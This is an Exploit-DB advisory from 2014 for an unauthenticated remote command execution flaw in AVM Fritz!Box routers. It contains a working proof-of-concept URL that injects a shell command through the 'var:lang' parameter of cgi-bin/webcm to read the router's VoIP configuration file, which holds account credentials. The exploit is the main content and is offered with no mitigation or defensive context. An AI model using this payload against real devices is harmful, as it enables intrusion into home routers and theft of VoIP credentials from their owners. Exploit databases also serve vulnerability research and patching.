Fritz!Box - Remote Command Execution

EDB-ID:

33136


Author:

0x4148

Type:

webapps


Platform:

Hardware

Date:

2014-05-01


App : Fritz!Box
Author : 0x4148

Fritz!Box is Networking/voice Over ip router produced by AVM it suffer from Unauthenticated remote command execution flaw

Poc :
https://ip/cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26%20cat%20/var/flash/voip.cfg%20%26

#0x4148_rise